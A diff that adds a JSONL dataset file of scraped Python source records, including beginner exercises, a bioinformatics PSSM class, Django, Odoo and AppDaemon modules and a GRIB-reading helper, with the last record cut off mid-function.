diff --git "a/529.jsonl" "b/529.jsonl" new file mode 100644--- /dev/null +++ "b/529.jsonl" @@ -0,0 +1,714 @@ +{"seq_id":"554689032","text":"numb = [1,4,1,64,2,128,5,4,7,31]\nprint('Trong dãy số: ')\nprint(*numb,sep=', ')\nfor i in range(len(numb)):\n if i < len(numb) - 1:\n for j in range(len(numb)):\n if i + j + 1 <= len(numb) - 1:\n total = int(numb[i]) * int(numb[i + j + 1])\n if total == 128:\n print('{} và {} tại vị trí {} và {}'.format(numb[i],numb[i + j + 1], i + 1, i + j + 2))\n else:\n j = j + 1\n","sub_path":"ProjectC4E/C4E-20/Fundamentals/Session03/128.py","file_name":"128.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"478568369","text":"with open(\"1_report_repair_input.txt\") as f:\n expenses = f.read()\n\nexpenses = expenses.split()\nexpenses = [int(expense) for expense in expenses]\n\nfor expense1 in expenses:\n for expense2 in expenses:\n for expense3 in expenses:\n if expense1 + expense2 + expense3 == 2020:\n print(expense1*expense2*expense3)\n","sub_path":"1_report_repair/1_2_report_repair.py","file_name":"1_2_report_repair.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"10152741","text":"import numpy as np\nfrom numpy import inf\n\n\n\"\"\"\nATTENTION: Use the following dictionaries to get the correct index for each\n amino acid when accessing any type of matrix or array provided as\n parameters. Further, use those indices when generating or returning\n any matrices or arrays. Failure to do so will most likely result in\n not passing the tests.\nEXAMPLE: To access the substitution frequency from alanine 'A' to proline 'P'\n in the bg_matrix use bg_matrix[AA_TO_INT['A'], AA_TO_INT['P']].\n\"\"\"\nALPHABET = 'ACDEFGHIKLMNPQRSTVWY-'\nAA_TO_INT = {aa: index for index, aa in enumerate(ALPHABET)}\nINT_TO_AA = {index: aa for index, aa in enumerate(ALPHABET)}\nGAP_INDEX = AA_TO_INT['-']\n\nALLOWED_CHARS = set(ALPHABET)\n\n\nclass MSA:\n\n def __init__(self, sequences):\n \"\"\"\n Initialize the MSA class with the provided list of sequences. Check the\n sequences for correctness. Pre-calculate any statistics you seem fit.\n\n :param sequences: List containing the MSA sequences.\n \"\"\"\n if len(sequences) == 0:\n return TypeError()\n\n seq_length = len(sequences[0])\n\n for seq in sequences:\n if len(seq) != seq_length:\n return TypeError()\n if not (set(seq).issubset(ALLOWED_CHARS)):\n return TypeError()\n\n self.sequences = sequences\n self.number_of_sequences = len(self.sequences)\n self.msa_length = seq_length\n self.primary_sequence = self.sequences[0].replace(ALPHABET[GAP_INDEX], '')\n self.calculate_sequence_weights()\n\n def calculate_sequence_weights(self):\n seqences_2D = np.array([ list(seq) for seq in self.sequences ])\n weights = np.zeros(np.shape(seqences_2D)[0], dtype=float)\n\n number_of_observed_aas = np.zeros(self.msa_length, dtype=float)\n\n for column_index in range(self.msa_length):\n observed_aas = np.unique(seqences_2D[:, column_index])\n number_of_observed_aas[column_index] = len(observed_aas)\n\n # r > 1\n if len(observed_aas) > 1:\n for aa in observed_aas:\n observation_indices = np.where(seqences_2D[:, column_index] == aa)\n\n for index in observation_indices:\n current_weight = 1 / (len(observation_indices[0]) * len(observed_aas))\n weights[index] += current_weight\n\n self.weights = weights\n self.observed_aas = np.sum(number_of_observed_aas) / self.msa_length\n\n def get_pssm(self, *, bg_matrix=None, beta=10, use_sequence_weights=False,\n redistribute_gaps=False, add_pseudocounts=False):\n \"\"\"\n Return a PSSM for the underlying MSA. Use the appropriate refinements \n according to the parameters. If no bg_matrix is specified, use uniform \n background frequencies.\n Every row in the resulting PSSM corresponds to a non-gap position in \n the primary sequence of the MSA (i.e. the first one).\n Every column in the PSSM corresponds to one of the 20 amino acids.\n Values that would be -inf must be replaced by -20 in the final PSSM.\n Before casting to dtype=numpy.int64, round all values to the nearest\n integer (do not just FLOOR all values).\n\n :param bg_matrix: Amino acid pair frequencies as numpy array (20, 20).\n Access the matrix using the indices from AA_TO_INT.\n :param beta: Beta value (float) used to weight the pseudocounts \n against the observed amino acids in the MSA.\n :param use_sequence_weights: Calculate and apply sequence weights.\n :param redistribute_gaps: Redistribute the gaps according to the \n background frequencies.\n :param add_pseudocounts: Calculate and add pseudocounts according \n to the background frequencies.\n\n :return: PSSM as numpy array of shape (L x 20, dtype=numpy.int64).\n L = ungapped length of the primary sequence.\n \"\"\"\n pssm = np.zeros((self.msa_length, 20), dtype=float)\n\n \n # 1) Calculate sequence weights\n\n weights = np.ones((len(self.sequences)), dtype=float)\n\n if use_sequence_weights:\n weights = self.weights\n\n # 2) Count (with weights) observed amino acids and gaps\n \n\n # for every aa in ALPHABET for every seq in the MSA count number of occurences\n for seqIndex, seq in enumerate(self.sequences):\n for row in range(self.msa_length):\n for column in range(20):\n if seq[row] == ALPHABET[column]:\n pssm[row, column] += weights[seqIndex]\n \n observed_aas = self.observed_aas\n\n # 3) Redistribute gaps according to background frequencies\n\n background_frequencies = np.full((20), 0.05, dtype=float)\n substitution_matrix = np.full((20,20), 0.05, dtype=float)\n\n if bg_matrix != None:\n substitution_matrix = bg_matrix\n for column in range(20):\n background_frequencies[column] = np.sum(bg_matrix[column])\n\n if redistribute_gaps:\n for seqIndex, seq in enumerate(self.sequences):\n for row in range(self.msa_length):\n gap_count = 0\n if seq[row] == '-':\n gap_count += weights[seqIndex]\n for column in range(20):\n pssm[row, column] += gap_count * background_frequencies[column]\n\n\n\n # 4) Add weighted pseudocounts\n if add_pseudocounts: \n pseudocounts = np.zeros((self.msa_length, 20), dtype=float)\n for row in range(self.msa_length):\n for column in range(20):\n # if pssm[row, column] == 0:\n # continue\n for j in range(20): \n pseudocounts[row, column] += pssm[row, column] / background_frequencies[column] * substitution_matrix[column][j]\n\n pssm += pseudocounts\n\n\n # 5) Normalize to relative frequencies\n\n for row in range(pssm.shape[0]):\n pssm[row,:] = pssm[row,:] / np.sum(pssm[row])\n\n # 6) Divide by background frequencies\n\n if bg_matrix == None:\n pssm = pssm / 0.05\n else:\n for column in range(20):\n pssm[:, column] = pssm[:, column] / background_frequencies[column]\n\n # 7) Calculate Log-Score\n pssm = 2 * np.log2(pssm)\n pssm[pssm == -inf] = -20\n pssm[pssm == -2e63] = -20\n\n # 8) Remove rows corresponding to gaps in the primary sequence (primary sequence = first in MSA)\n \n gap_indices_in_primary_sequence = [pos for pos, char in enumerate(self.sequences[0]) if char == '-']\n\n pssm = np.delete(pssm, gap_indices_in_primary_sequence, axis=0)\n\n pssm = np.rint(pssm).astype(np.int64)\n print(pssm[0])\n return pssm\n\n\n def get_size(self):\n \"\"\"\n Return the number of sequences in the MSA and the MSA length, i.e.\n the number of columns in the MSA. This includes gaps.\n\n :return: Tuple of two integers. First element is the number of\n sequences in the MSA, second element is the MSA length.\n \"\"\"\n return (self.number_of_sequences, self.msa_length)\n \n\n def get_primary_sequence(self):\n \"\"\"\n Return the primary sequence of the MSA. In this exercise, the primary\n sequence is always the first sequence of the MSA. The returned \n sequence must NOT include gap characters.\n\n :return: String containing the ungapped primary sequence.\n \"\"\"\n return self.primary_sequence\n\n\n def get_sequence_weights(self):\n \"\"\"\n Return the calculated sequence weights for all sequences in the MSA.\n The order of weights in the array must be equal to the order of the\n sequences in the MSA.\n\n :return: Numpy array (dtype=numpy.float64) containing the weights for\n all sequences in the MSA.\n \"\"\"\n return self.weights\n\n\n def get_number_of_observations(self):\n \"\"\"\n Return the estimated number of independent observations in the MSA.\n\n :return: Estimate of independent observation (dtype=numpy.float64).\n \"\"\"\n return self.observed_aas\n","sub_path":"codechecker/repos/4/collected_files/pssm/ga49vey.py","file_name":"ga49vey.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"300198137","text":"import os\nimport re\nfrom shutil import copyfile\nimport webbrowser\n\n\ndef create_movie_tiles_content(movies):\n # The HTML content for this section of the page\n content = ''\n for movie in movies:\n # Load the template for display the movies\n movie_tile_content_file = open('movie_template.html')\n movie_tile_content = movie_tile_content_file.read()\n movie_tile_content_file.close()\n\n # Append the tile for the movie with its content filled in\n content += movie_tile_content.format(\n movie_title=movie.title,\n poster_image_url=movie.poster_image_url,\n trailer_youtube_id=movie.trailer_youtube_url\n # storyline= movie.storyline\n )\n\n if not content:\n content = \"No movies were found :'(\"\n\n return content\n\n\ndef open_movies_page(movies):\n # Create or overwrite the output file\n output_file = open(os.path.join('dist', 'index.html'), 'w')\n\n # Load the template for display the movies\n main_page_content_file = open('template.html')\n main_page_content = main_page_content_file.read()\n main_page_content_file.close()\n\n # Replace the movie tiles placeholder generated content\n rendered_content = main_page_content.format(\n movie_tiles=create_movie_tiles_content(movies))\n\n # Output the file\n output_file.write(rendered_content)\n output_file.close()\n\n # Copy CSS and JS to dist folder\n copyfile('main.css', os.path.join('dist', 'main.css'))\n copyfile('main.js', os.path.join('dist', 'main.js'))\n copyfile('favicon.ico', os.path.join('dist', 'favicon.ico'))\n\n # open the output file in the browser (in a new tab, if possible)\n url = os.path.abspath(output_file.name)\n webbrowser.open('file://' + url, new=2)\n","sub_path":"fresh_tomatoes.py","file_name":"fresh_tomatoes.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"368067776","text":"import tensorflow as tf\nimport argparse\nfrom util.rsdae_data_generator import RSDAEDataGenerator\n\n\ndef load_dict(filename):\n print(\"Loading dict\", filename)\n forward = dict()\n reverse = dict()\n with open(filename, 'rb') as reader:\n for line in reader:\n line = line.decode(\"utf-8\").strip()\n idx = len(forward)\n forward[line] = idx\n reverse[idx] = line\n\n return forward, reverse\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Gather psn profiles')\n parser.add_argument('--input', required=True, help='Input file', metavar='#')\n parser.add_argument('--words', required=True, help='Word dict', metavar='#')\n parser.add_argument('--postags', required=True, help='POS tag dict', metavar='#')\n\n args = parser.parse_args()\n\n print(\"Initialized with settings:\")\n print(\" \", vars(args))\n\n _, reverse_words = load_dict(args.words)\n _, reverse_postags = load_dict(args.postags)\n\n print(\"Initialising data generator...\")\n data_tensors = RSDAEDataGenerator.get_data_tensor(args.input)\n iterator = data_tensors.make_one_shot_iterator()\n cur_words, cur_postags = iterator.get_next()\n print(\"Done\")\n\n with tf.Session() as sess:\n print(cur_words.eval())","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"240373349","text":"from django.urls import path\nfrom second_app.views import index,user,form_detail_view,relative\n\napp_name = 'second_app'\nurlpatterns=[\n path('index/',index,name='index'),\n path('users/',user,name='user'),\n path('form_details/',form_detail_view,name='form_details'),\n path('relative/',relative,name='relative')\n]\n\n","sub_path":"first_project/second_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"422027498","text":"import appdaemon.plugins.hass.hassapi as hass\nimport globals\n\n#\n# App which listens on the log for WARNING and ERROR and notifies via telegram\n#\n# Args:\n#\n# Release Notes\n#\n# Version 1.0:\n# Initial Version\n\n\nclass AppWatcher(hass.Hass):\n def initialize(self):\n self.notify_name = globals.get_arg(self.args, \"notify_name\")\n self.notify_message = globals.get_arg(self.args, \"notify_message\")\n self.include_log_message_in_notification = globals.get_arg(\n self.args, \"include_log_message_in_notification\"\n )\n try:\n self.exclude_apps = globals.get_arg_list(self.args, \"exclude_apps\")\n except KeyError:\n self.exclude_apps = None\n\n # App dependencies\n self.notifier = self.get_app(\"Notifier\")\n\n self.listen_log(self.log_message_callback)\n\n def log_message_callback(self, name, ts, level, message):\n if level == \"WARNING\" or level == \"ERROR\" or level == \"CRITICAL\":\n self.log(\"Correct level: {}\".format(level))\n self.log(\"name: {}\".format(name))\n if name == \"Appdaemon\":\n self.log(\"Is Appdaemon message\")\n # check if this is a warning for an app\n try:\n app_message_start_index = message.index(\":\", 11) + 2\n except ValueError:\n app_message_start_index = None\n self.log(\n \"app_message_start_index is: {}\".format(app_message_start_index)\n )\n first_space_index = message.index(\" \", 11)\n self.log(\"first_space_index is: {}\".format(first_space_index))\n if app_message_start_index is not None:\n if app_message_start_index > first_space_index:\n app_name = message[11, message.index(\":\", 11)]\n\n app_message = message[app_message_start_index:]\n\n self.notifier.notify(\n self.notify_name,\n self.notify_message.format(app_name),\n useAlexa=False,\n )\n if self.include_log_message_in_notification:\n self.notifier.notify(\n self.notify_name, app_message, useAlexa=False\n )\n\n def terminate(self):\n self.cancel_listen_log()\n","sub_path":"appWatcher/appWatcher.py","file_name":"appWatcher.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"394483180","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport math\n\nclass Mapper:\n def __init__(self):\n pass\n def __call__(self, key, value):\n value = value.replace(' ', '')\n tempArr = value.split(\"->\")\n user = tempArr[0]\n tempArr1 = tempArr[1].split(\",\")\n fndWithStatus = tempArr[1].replace(\",\", \"->\")\n yield user, (tempArr1[0]+'->'+tempArr1[1])\n yield tempArr1[0], tempArr1[1]\n\n\ndef reducer(key, values):\n ''''yield key, sum(values)'''\n prevUser = None\n tempValArr = []\n criminalRecCount = 0\n nonCriminalRecCount = 0\n for temp in values:\n tempValArr.append(temp)\n tempArr1 = []\n if '->' in temp:\n tempArr1 = temp.split('->')\n if (len(tempArr1) > 1) and (tempArr1[1] == 'yes'):\n criminalRecCount += 1\n elif (len(tempArr1) > 1) and (tempArr1[1] == 'no'):\n nonCriminalRecCount += 1\n \n totalNumberOfFnds = criminalRecCount+nonCriminalRecCount\n if ((nonCriminalRecCount != 0) and (float(float(criminalRecCount)*100/float(totalNumberOfFnds)) >= 50) and ('yes' not in tempValArr)):\n yield key, 'atrisk'\n else:\n yield key, 'not-atrisk'\n\nif __name__ == \"__main__\":\n import dumbo\n dumbo.run(Mapper, reducer, combiner=None)\n","sub_path":"assignment1/Question3/findUsersAtRisk.py","file_name":"findUsersAtRisk.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"22178120","text":"# encoding: utf-8\n# ---------------------------------------------------------------------------\n# Copyright (C) 2008-2014, IPython Development Team and Enthought, Inc.\n# Distributed under the terms of the BSD License. See COPYING.rst.\n# ---------------------------------------------------------------------------\n\n\ndef plot_dist_matrix(name, mec):\n mec.execute('_dm = %s.get_dist_matrix()' % name, 0)\n _dm = mec.zip_pull('_dm', 0)\n import pylab\n pylab.ion()\n pylab.matshow(_dm)\n pylab.colorbar()\n pylab.show()\n","sub_path":"benchmarks/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"13888233","text":"'''\nregister, user viewsets, smscode\n'''\n\nfrom rest_framework import serializers, viewsets, status\nfrom rest_framework.response import Response\nfrom rest_framework.mixins import CreateModelMixin\nfrom rest_framework.views import APIView\nfrom rest_framework.filters import SearchFilter, OrderingFilter\nfrom django.contrib.auth import get_user_model\nfrom django_filters.rest_framework import DjangoFilterBackend\n\nfrom faker import Faker\n\nfrom .serializers import UserRegSerializer, SmsSerializer, UserSerializer\nfrom .models import VerifyCode\n\nUser = get_user_model()\n\n# ViewSets define the view behavior.\nclass UserRegViewSet(viewsets.ModelViewSet):\n '''用户注册'''\n queryset = User.objects.all()\n serializer_class = UserRegSerializer\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n '''用户数据'''\n queryset = User.objects.all()\n serializer_class = UserSerializer\n filterset_fields = ('id', 'username',)\n filter_backends = [DjangoFilterBackend, SearchFilter, OrderingFilter]\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n datas = serializer.data\n datas['name'] = datas['username']\n data = {\n 'code': 20000,\n 'data': datas\n }\n return Response(data)\n\nclass SmsCodeViewset(viewsets.ModelViewSet):\n '''\n 手机验证码\n '''\n queryset = VerifyCode.objects.all()\n serializer_class = SmsSerializer\n\n def generate_code(self):\n \"\"\"\n 生成四位数字的验证码\n \"\"\"\n faker = Faker()\n return faker.numerify('####')\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n #验证合法\n serializer.is_valid(raise_exception=True)\n mobile = serializer.validated_data[\"mobile\"]\n\n #生成验证码\n code = self.generate_code()\n code_record = VerifyCode(code=code, mobile=mobile)\n code_record.save()\n return Response({\n \"mobile\": mobile,\n \"code\": code\n }, status=status.HTTP_201_CREATED)\n","sub_path":"apps/user/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"578044313","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom html.parser import HTMLParser\n\nclass LinkPrinter(HTMLParser):\n \"\"\"\n Preant each link from HTML web page\n \"\"\"\n def handle_starttag(self, tag, attrs):\n if tag == \"a\":\n for name, value in attrs:\n if name == \"href\":\n print(value)\n\n# data = ...\nLinkPrinter().feed(data)\n","sub_path":"examples/xml_html_parsers/link_printer_html.py","file_name":"link_printer_html.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"41766842","text":"import os, sys\n\ndef main():\n pass\n\ndef checkSumInList(inputList, valueToFind):\n sortedList = sorted(inputList)\n minPos, maxPos = 0, len(sortedList)-1\n\n while sortedList[maxPos] > valueToFind and maxPos != minPos:\n maxPos -= 1\n\n searchValue = valueToFind - sortedList[maxPos]\n\n while maxPos > minPos:\n minPos = 0\n\n while minPos < maxPos:\n if sortedList[minPos] + sortedList[maxPos] == valueToFind:\n return True\n\n if sortedList[minPos] > searchValue:\n break\n\n minPos += 1\n maxPos -= 1\n searchValue = valueToFind - sortedList[maxPos]\n return False\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"other/sum-in-list/sumInList.py","file_name":"sumInList.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"147022481","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\ndef test_hah(driver):\n driver.get(\"http://www.python.org\")\n assert \"Python\" in driver.title\n elem = driver.find_element_by_name(\"q\")\n elem.clear()\n elem.send_keys(\"pycon\")\n elem.send_keys(Keys.RETURN)\n assert (True == True)","sub_path":"test_xd.py","file_name":"test_xd.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"555621256","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nimport datetime\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n @api.depends('partner_id')\n def _compute_check_partner_(self):\n for record in self:\n if record.partner_id.is_company:\n record.check_partner_company = True\n\n receive_ids = fields.One2many('dham.patient.recieve', 'sale_order_id', 'Receive ID')\n order_type = fields.Selection([('medicine', 'Medicine'), ('food-drink', 'Foods and Drinks'), ('none', 'None')],\n default='none', string='Order Type')\n medic_contract_id = fields.Many2one('res.partner.company.check', 'Medic Contract')\n check_partner_company = fields.Boolean('Check Partner',compute='_compute_check_partner_')\n package_ids = fields.Many2many('medic.package', 'medic_sale_order_package_package_ref', 'order_id',\n 'package_id', 'Packages', domain=[('type', '=', 'company')], required=1)\n\n @api.onchange('package_ids')\n def onchange_package_ids(self):\n if 'no_onchange_package' in self.env.context:\n return\n ProductObj = self.env['product.product']\n\n for record in self:\n record.invoice_line_ids = False\n if record.package_ids:\n product_list = record.package_ids.parse_multi_package()\n for product in product_list:\n product_id = ProductObj.browse(int(product[0]))\n record.order_line += record.order_line.new({\n 'name': product_id.description or product_id.name,\n 'product_id': product_id.id,\n 'product_uom_qty': 1,\n 'price_unit': product[1],\n 'product_uom': product_id.uom_id.id or False,\n 'tax_id': product_id.taxes_id.ids or [],\n })\n\n @api.onchange('order_type')\n def onchange_order_type(self):\n warehouse = self.env['hr.department'].sudo().find_ware_house(self._uid)\n if self.order_type == 'medicine':\n if warehouse:\n self.warehouse_id = warehouse.id\n self.picking_policy = 'one'\n\n if self.order_type == 'food-drink':\n if warehouse:\n self.warehouse_id = warehouse.id\n self.picking_policy = 'one'\n \n @api.multi\n def action_create_package(self):\n for record in self:\n record._action_create_package()\n return \n \n @api.model\n def _action_create_package(self):\n MedicContract = self.env['res.partner.company.check']\n if self.order_line:\n package_id = self.parse_medic_package()\n data = {\n 'name' : self.partner_id.name + ' - ' + self.name,\n 'company_id' : self.partner_id.id,\n 'package_ids': [(6, 0,[package_id.id])],\n 'sale_order_id' : self.id,\n }\n new_contract = MedicContract.create(data)\n self.write({'medic_contract_id' : new_contract.id})\n return new_contract\n \n @api.model\n def parse_medic_package(self):\n Package = self.env['medic.package']\n data = {\n 'name' : self.partner_id.name + ' - ' + self.name,\n 'type' : 'company',\n 'line_ids' : [],\n }\n for line in self.order_line:\n data['line_ids'].append(\n (0, 0, {\n 'product_id' : line.product_id.id,\n 'price' : line.price_unit,\n })\n )\n return Package.create(data)\n\nclass SaleOrderLine(models.Model):\n _inherit = 'sale.order.line'\n\n order_type = fields.Selection([('medicine', 'Medicine'), ('food-drink', 'Foods and Drinks'), ('none', 'None')],\n default='none', string='Order Type')\n\n @api.onchange('order_type')\n def onchange_order_type(self):\n if self.order_type == 'medicine':\n try:\n return {\n 'domain': {\n 'product_id': [('categ_id', '=', self.env.ref('dham_medic.product_ctg_medicines').id)]\n }\n }\n except:\n pass\n if self.order_type == 'food-drink':\n try:\n return {\n 'domain': {\n 'product_id': [('categ_id', '=', self.env.ref('dham_medic.product_ctg_food_drink').id)]\n }\n }\n except:\n pass","sub_path":"dham_medic/sale/models/medic_sale_order.py","file_name":"medic_sale_order.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"592738129","text":"\"\"\"\r\nID:ayush02\r\nLANG:PYTHON3\r\nTASK:triangles\r\n\"\"\"\r\nimport itertools\r\n\r\ndef valid_triangle(vertex, point1, point2):\r\n x_cord, y_cord = vertex\r\n if point1[0] == x_cord and point2[1] == y_cord:\r\n return True\r\n\r\ndef find_area(vertex, point1, point2):\r\n base1 = abs(point1[0] - vertex[0])\r\n height1 = abs(point2[1] - vertex[1])\r\n\r\n base2 = abs(point2[0] - vertex[0])\r\n height2 = abs(point1[1] - vertex[1])\r\n\r\n return max((base2 * height2 / 2), (base1 * height1 / 2))\r\n\r\n#Full path: C:/Users/ayush/OneDrive/Desktop/USACO/triangles/triangles.in\r\nwith open('triangles.in', 'r') as fin:\r\n n = int(fin.readline())\r\n coordinates = []\r\n for i in range(n):\r\n x, y = map(int, fin.readline().split())\r\n coordinates.append([x, y])\r\n\r\n#Find vertex coordinate\r\ncombinations = list(itertools.permutations(coordinates, 3))\r\n\r\nvalid = []\r\nfor combo in combinations:\r\n vertex, point1, point2 = combo\r\n if valid_triangle(vertex, point1, point2) == True:\r\n valid.append(combo)\r\n\r\narea = []\r\nfor combo in valid:\r\n vertex, point1, point2 = combo\r\n area.append(find_area(vertex, point1, point2))\r\n\r\nanswer = max(area)\r\n\r\nwith open('triangles.out', 'w') as fout:\r\n fout.write(str(int(answer * 2)))\r\n","sub_path":"triangles/triangles.py","file_name":"triangles.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"269728005","text":"# coding=utf-8\n#------------------------------------------------------------------------------\n# Name: miub_eccodes.py\n# Purpose: miub eccodes functions\n#\n# Author: Kai Muehlbauer\n#\n# Created: 23.03.2016\n# Copyright: (c) Kai Muehlbauer 2016\n# Licence: The MIT License\n#------------------------------------------------------------------------------\n# This module is far from being mature\n# may change without notice\n\nimport numpy as np\nimport eccodes as ecc\n#from collections import OrderedDict\n#from dictdiffer import diff\n\ndef get_ecc_value_from_file(filename, keyname, keyvalue):\n\n f = open(filename)\n\n gids = get_ecc_gids(filename)\n value = get_ecc_value(gids, keyname, keyvalue)\n release_ecc_gids(gids)\n\n f.close()\n\n return value\n \ndef get_ecc_value(gids, keyname, keyvalue):\n \n first = True\n \n for i, gid in enumerate(gids):\n if ecc.codes_get(gid, keyname) == keyvalue:\n if first: \n Ni = ecc.codes_get(gid, 'Ni')\n Nj = ecc.codes_get(gid, 'Nj')\n data = np.array(ecc.codes_get_values(gid))\n first = False\n else:\n data = np.dstack((data, np.array(ecc.codes_get_values(gid))))\n\n return np.squeeze(data.reshape(Ni, Nj, -1))\n\ndef get_ecc_subkey(gids, keyname, keyvalue, subkey):\n \n for i, gid in enumerate(gids):\n if ecc.grib_get(gid, keyname) == keyvalue:\n data = ecc.grib_get(gid, subkey)\n break\n \n return data\n\ndef get_ecc_gids(filename):\n f = open(filename)\n msg_count = ecc.codes_count_in_file(f)\n # TODO: this is only for grib files\n gid_list = [ecc.codes_grib_new_from_file(f) for i in range(msg_count)]\n #print(gid_list)\n f.close()\n return gid_list\n\ndef release_ecc_gids(gids):\n for gid in gids:\n ecc.codes_release(gid)\n\ndef get_ecc_data(gids):\n \n grib_dict = {}\n \n for i, gid in enumerate(gids):\n sn = ecc.grib_get(gid, 'short_name')\n if sn not in grib_dict:\n tmp = {}\n Ni = ecc.grib_get(gid, 'Ni')\n Nj = ecc.grib_get(gid, 'Nj')\n tmp['data'] = np.array(ecc.grib_get_values(gid)).reshape(Nj,Ni,1)\n tmp['shape'] = tmp['data'].shape \n grib_dict[sn] = tmp\n else:\n #print(grib_dict[sn]['data'].shape)\n #if ecc.grib_is_defined(gid, 'levels'):\n # print(ecc.grib_get(gid, 'levels'))\n Ni, Nj, Nk = grib_dict[sn]['data'].shape\n grib_dict[sn]['data'] = np.dstack((grib_dict[sn]['data'], np.array(ecc.grib_get_values(gid)).reshape(Nj,Ni)))\n grib_dict[sn]['shape'] = grib_dict[sn]['data'].shape \n \n return grib_dict\n\n\ndef get_ecc_variable(filename, key, namespace=None, skipkeys=None):\n \n gids = get_ecc_gids(filename) \n \n grib_dict = {}\n \n for i, gid in enumerate(gids):\n tmp = get_ecc_msg(gid, namespace=namespace, skipkeys=skipkeys)\n sn = tmp['shortName']\n print(\"Shortname:\", sn)\n for k, v in tmp.items():\n print(k, type(v))\n if sn == key:\n if sn not in grib_dict: \n grib_dict[sn] = tmp\n #else:\n # d = list(diff(grib_dict[sn], tmp))\n # print(d)\n # for key in d:\n # if key[0] == 'change':\n # try:\n # grib_dict[sn][key[1]] = np.dstack((grib_dict[sn][key[1]], tmp[key[1]]))\n # except ValueError:\n # grib_dict[sn][key[1]] = np.array([grib_dict[sn][key[1]], tmp[key[1]]])\n return grib_dict\n\ndef get_ecc_file(filename, namespace=None, skipkeys=None):\n \n gid_list = get_ecc_gids(filename)\n\n print(len(gid_list), gid_list)\n\n grib_dict = {}\n\n for i, gid in enumerate(gid_list):\n tmp = get_ecc_msg(gid, namespace=namespace, skipkeys=skipkeys)\n sn = tmp['shortName']\n if sn not in grib_dict:\n grib_dict[sn] = tmp\n else:\n d = list(diff(grib_dict[sn], tmp))\n for key in d:\n if key[0] == 'change':\n try:\n grib_dict[sn][key[1]] = np.dstack((grib_dict[sn][key[1]], tmp[key[1]]))\n except ValueError:\n grib_dict[sn][key[1]] = np.array([grib_dict[sn][key[1]], tmp[key[1]]])\n return grib_dict\n \ndef get_ecc_msg_keys(gid, namespace=None, skipkeys=None):\n \"\"\"Retrieve keys from one particular ecc message\n\n Parameters\n ----------\n gid : ecc message id\n namespace : string\n namespace to be retrieved, defaults to None (means all)\n 'ls', 'parameter', 'time', 'geography', 'vertical', 'statistics', 'mars'\n skipkeys : list of strings\n keys to be skipped, defaults to None\n possible keys: 'computed', 'coded', 'edition', 'duplicates', 'read_only', 'function'\n \n Returns\n -------\n data : list of ecc message keys \n \"\"\"\n \n # get key iterator\n iterid = ecc.codes_keys_iterator_new(gid, namespace)\n \n # Different types of keys can be skipped\n if skipkeys:\n if 'computed' in skipkeys:\n ecc.codes_skip_computed(iterid)\n if 'coded' in skipkeys:\n ecc.codes_skip_coded(iterid)\n if 'edition' in skipkeys:\n ecc.codes_skip_edition_specific(iterid)\n if 'duplicates' in skipkeys:\n ecc.codes_skip_duplicates(iterid)\n if 'read_only' in skipkeys:\n ecc.codes_skip_read_only(iterid)\n if 'function' in skipkeys: \n ecc.codes_skip_function(iterid)\n \n data = []\n # iterate over message keys\n while ecc.codes_keys_iterator_next(iterid):\n keyname = ecc.codes_keys_iterator_get_name(iterid)\n # add keyname-keyvalue-pair to output dictionary\n data.append(keyname)\n \n # release iterator\n ecc.codes_keys_iterator_delete(iterid)\n\n return data\n\n \ndef get_ecc_msg(gid, namespace=None, skipkeys=None):\n \"\"\"Read data from one particular ecc message\n\n Parameters\n ----------\n gid : ecc message id\n namespace : string\n namespace to be retrieved, defaults to None (means all)\n 'ls', 'parameter', 'time', 'geography', 'vertical', 'statistics', 'mars'\n skipkeys : list of strings\n keys to be skipped, defaults to None\n possible keys: 'computed', 'coded', 'edition', 'duplicates', 'read_only', 'function'\n \n\n Returns\n -------\n data : dictionary of ecc message contents \n \"\"\"\n \n # get key iterator\n iterid = ecc.codes_keys_iterator_new(gid, 